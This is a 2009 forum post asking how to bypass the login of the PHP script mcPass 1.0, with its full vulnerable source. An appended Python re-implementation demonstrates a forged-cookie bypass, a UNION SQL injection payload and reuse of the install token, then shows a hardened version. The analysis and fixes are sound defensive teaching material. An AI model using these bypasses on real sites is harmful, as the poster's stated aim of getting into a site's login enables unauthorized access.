Php Login Form Bypassing, A login form I need to bypass
Monday, March 9, 2009, maopz tutorials

Hello,
I'm pretty new to web hacking (it's been a month or so), but I already know the basics, and I've been web designing for about a year, so I know what I'm talking about.
I've recently found a login script on a site, and I was just getting interested in how to bypass it.
I looked it up a bit and found the source code; it looks like this:
CODE
<?
// mcPass 1.0 - copyright 2002 Marc Cagninacci - marc@phpforums.net - http://www.phpforums.net
// Configuration MySQL - Set this
$host="localhost";
$login="root";
$pass="";
$base="mcpass";
// Language - Set this
$lErrLog= "Nom Incorrect"; // "Wrong Login";
$lErrPass= "Mot de Passe Incorrect"; // "Wrong Password";
$lLogin= "Nom"; // "Login";
$lPass= "Mot de Passe"; // "Password";
$lValider= "Valider"; // "Submit";
/*
--------------------------------------------------------------------------------------
- Envoyez ce fichier mcPass.php à la RACINE de votre site
Upload this file mcPass.php in the ROOT of your site
- Copiez les quatre lignes suivantes tout en haut de chaque page que vous voulez protéger:
Paste the four lines below at the very top of each page you want to protect:
--------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------
<?
$ok = explode(":",$HTTP_COOKIE_VARS["mcPass"]);
if(empty($ok[0])){ header("location:http://$HTTP_HOST/mcPass.php?go=$PHP_SELF"); }
?>
--------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------
- Naviguez jusqu'à http://www.votresite.com/mcPass.php et saisissez un nom et un mot de passe.
Go to http://www.yoursite.com/mcPass.php and choose a login and a password
--------------------------------------------------------------------------------------
----------Ne rien modifier en dessous - Don't modify anything below-------------------
--------------------------------------------------------------------------------------
*/
if(!$go)
{
$connect= mysql_connect($host,$login,$pass);
mysql_select_db($base, $connect);
$result = mysql_list_tables ($base);
$i = 0;
while ($i < mysql_num_rows($result)) {
$tb_names[$i] = mysql_tablename ($result, $i);
if ($tb_names[$i]=="mcpass_tbl") $table=1;
$i++;
}
if ($table==1)
{
$install= 'Running';
}
}
if((isset($SubInst))&&($b==md5($base)))
{
$connect= mysql_connect($host,$login,$pass);
mysql_select_db($base, $connect);
$query="DROP TABLE IF EXISTS mcpass_tbl;";
mysql_query($query);
$query="CREATE TABLE mcpass_tbl (
user varchar(20) NOT NULL default '',
pwd varchar(20) NOT NULL default '',
KEY user (user)
) TYPE=MyISAM;";
mysql_query($query);
$query="insert into mcpass_tbl values('$user', '$pwd')";
mysql_query($query, $connect);
$query="select * from mcpass_tbl";
$res=mysql_query($query);
$aff=mysql_fetch_array($res);
}
function mcPassCookie ($user,$pwd)
{
SetCookie("mcPass", "$user:$pwd");
}
if(isset($submit))
{
$connect= mysql_connect($host,$login,$pass);
mysql_select_db($base, $connect);
$query="select * from mcpass_tbl where user='$user'";
$res=mysql_query($query);
$verif=mysql_fetch_array($res);
if($pwd==$verif[pwd] && mysql_num_rows($res)!=0)
{
mcPassCookie($user,$pwd);
?>
<script TYPE="text/javascript" LANGUAGE="JavaScript">
document.location.replace("<? echo $go.''; ?>");
</script>
<?
}
elseif (mysql_num_rows($res)==0) $Err1=$lErrLog;
else $Err2=$lErrPass;
}
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>mcPass</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<META HTTP-EQUIV="Expires" CONTENT="Fri, Jan 01 1900 00:00:00 GMT">
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META HTTP-EQUIV="Cache-Control" CONTENT="no-cache">
<style type="text/css">
a:actif { font-family: Verdana; color: black; text-decoration: none}
a:link { font-family: Verdana; color: black; text-decoration: none}
a:visited { font-family: Verdana; color: black; text-decoration: none}
a:hover { font-family: Verdana; color: white; text-decoration: none}
-
</style>
</head>
<body bgcolor="#C0C0C0" text="black">
<p align="right"><font face="verdana" size="5" color="black">
<a href="http://www.phpforums.net/index.php?dir=dld"
target="_blank">mcPass</a>
<?
if((!$go)&&(!$install)) echo ' - Set Up';
if ((!$go)&&(isset($install)))
{
echo ' is running.</font></p><hr>';
echo '<p align="right"><a
href=".$HTTP_HOST."><b>OK</b></a></p>';
echo '</body></html>';
exit();
}
?>
</font>
</p><hr>
<form action="mcPass.php" method="get">
<table align="right">
<tr>
<td align="right"><font face="Verdana, Arial, Helvetica,
sans-serif" size="2"><b>
<?
if(isset($Err1))
{
echo '<font color="red" size="2" face="verdana"><b>'.$Err1.'!
</b></font>';
}
echo $lLogin;
?>
: </b></font>
</td>
<td>
<?
if (isset($aff[0])) echo '<font color="red" size="2"
face="verdana"><b>'.$aff[0].'</b></font>';
else echo '<input type="text" name="user" value="'.$user.'">';
?>
</td>
</tr>
<tr>
<td align="right"><font face="Verdana, Arial, Helvetica,
sans-serif" size="2"><b>
<?
if(isset($Err2))
{
echo '<font color="red" size="2" face="Verdana"><b>'.$Err2.'!
</b></font>';
}
echo $lPass;
?>
:</b></font>
</td>
<td>
<?
if (isset($aff[1])) echo '<font color="red" size="2"
face="verdana"><b>'.$aff[1].'</b></font>';
else echo '<input type="password" name="pwd">';
?>
</td>
</tr>
<tr>
<td>
</td>
<td>
<?
if((!$go)&&(!$SubInst))
{
echo '<input type="submit" name="SubInst"
value="'.$lValider.'">';
echo '<input type="hidden" name="b" value="'.md5($base).'">';
}
elseif(isset($SubInst)) echo '<a
href=".$HTTP_HOST."><b>OK</b></a>';
else
{
echo '<input type="submit" name="submit"
value="'.$lValider.'">';
echo '<input type="hidden" name="go" value="'.$go.'">';
}
?>
</td>
</tr>
</table>
</form>
<br><br><br><br><br><br>
<br><br><br><br><br><br>
<p align="center">
<a href="http://validator.w3.org/check/referer"><img border="0"
src="http://www.w3.org/Icons/valid-html401"
alt="Valid HTML 4.01!" height="31" width="88"></a>
</p>
</body>
</html>
I see that the code is a bit outdated, but I'm still not that good at finding vulnerabilities in this code.
Any help would be appreciated =)
Regards
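The points in the posted script that decide whether a request is trusted, modelled as an added example (Python over an in-memory SQLite table; this is not the poster's code and not mcPass's own): the cookie gate that each protected page runs, the login branch with its string-built query, and the install branch keyed on md5($base). Table and column names, the cookie format and the install token come from the script above; the 'admin'/'s3cret-demo' row and the function names are assumptions made for the demo.

```python
"""Added example for this page (not the poster's code and not mcPass's own):
the three trust decisions in the posted mcPass.php, re-implemented in Python
over an in-memory SQLite table so they can be exercised offline.  Table and
column names, the cookie format and the install token come from the posted
script; the sample credentials are constructed for the demo."""
import hashlib
import hmac
import sqlite3
from typing import Optional


def make_db() -> sqlite3.Connection:
    # Same shape as the CREATE TABLE in the SubInst branch: plaintext pwd.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE mcpass_tbl (user TEXT NOT NULL DEFAULT '', "
               "pwd TEXT NOT NULL DEFAULT '')")
    db.execute("INSERT INTO mcpass_tbl VALUES ('admin', 's3cret-demo')")  # constructed row
    return db


def page_gate_allows(mcpass_cookie: Optional[str]) -> bool:
    """The four-line guard pasted at the top of each protected page:
         $ok = explode(":", $HTTP_COOKIE_VARS["mcPass"]);
         if (empty($ok[0])) { header("location: .../mcPass.php?go=..."); }
    Only the text before the first ':' is tested for emptiness; nothing is
    compared with the database, so any client-chosen cookie passes."""
    if mcpass_cookie is None:            # no cookie -> explode() yields [""] -> redirect
        return False
    first_field = mcpass_cookie.split(":", 1)[0]
    return first_field not in ("", "0")  # PHP empty() is true for "" and "0"


def login_vulnerable(db: sqlite3.Connection, user: str, pwd: str) -> bool:
    """The isset($submit) branch, with the query built by interpolation exactly
    as on the page:  select * from mcpass_tbl where user='$user'
    then  if ($pwd == $verif[pwd] && mysql_num_rows($res) != 0)"""
    query = f"select * from mcpass_tbl where user='{user}'"
    rows = db.execute(query).fetchall()
    if not rows:
        return False
    verif = rows[0]                      # mysql_fetch_array(): first row only
    return pwd == verif[1]


def install_token(base: str) -> str:
    """Hidden form field b = md5($base); $base is the DB name, 'mcpass' by default."""
    return hashlib.md5(base.encode()).hexdigest()


def install_rerun_allowed(params: dict, base: str = "mcpass") -> bool:
    """if ((isset($SubInst)) && ($b == md5($base))) -> DROP TABLE, CREATE,
    INSERT '$user','$pwd'.  The check does not look at $install, so the
    branch stays reachable after setup for anyone who knows the DB name."""
    return "SubInst" in params and params.get("b") == install_token(base)


def login_hardened(db: sqlite3.Connection, user: str, pwd: str) -> bool:
    """Parameterized lookup plus constant-time compare.  Storage is left as
    plaintext only so the demo table is unchanged; a real fix also hashes
    the stored password and issues a random server-side session id instead
    of the user:pwd cookie."""
    row = db.execute("SELECT pwd FROM mcpass_tbl WHERE user = ?", (user,)).fetchone()
    if row is None:
        return False
    return hmac.compare_digest(row[0].encode(), pwd.encode())


def demo() -> dict:
    db = make_db()
    # The WHERE clause matches nothing; the UNION row supplies a pwd the
    # attacker already knows, so $pwd == $verif[pwd] succeeds.
    injected_user = "' UNION SELECT 'nobody', 'attacker-chosen' -- "
    return {
        "gate_no_cookie": page_gate_allows(None),
        "gate_forged_cookie": page_gate_allows("anything:at-all"),
        "gate_empty_first_field": page_gate_allows(":x"),
        "login_wrong_pwd": login_vulnerable(db, "admin", "guess"),
        "login_sqli": login_vulnerable(db, injected_user, "attacker-chosen"),
        "install_rerun": install_rerun_allowed({"SubInst": "Valider", "b": install_token("mcpass")}),
        "hardened_sqli": login_hardened(db, injected_user, "attacker-chosen"),
        "hardened_real": login_hardened(db, "admin", "s3cret-demo"),
    }


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name:24} {outcome}")
```

Running demo() shows that the gate accepts any cookie whose text before the first ':' is non-empty, that the UNION payload in the user field makes the plaintext comparison succeed with an attacker-chosen password, and that the install branch is satisfied by md5 of the database name, which is the value the setup form itself puts in the hidden field b. Parameterizing the query (login_hardened) stops the injection; the cookie design and the unconditioned install branch need separate fixes: a random session identifier validated server-side, and an install step that refuses to run once mcpass_tbl exists.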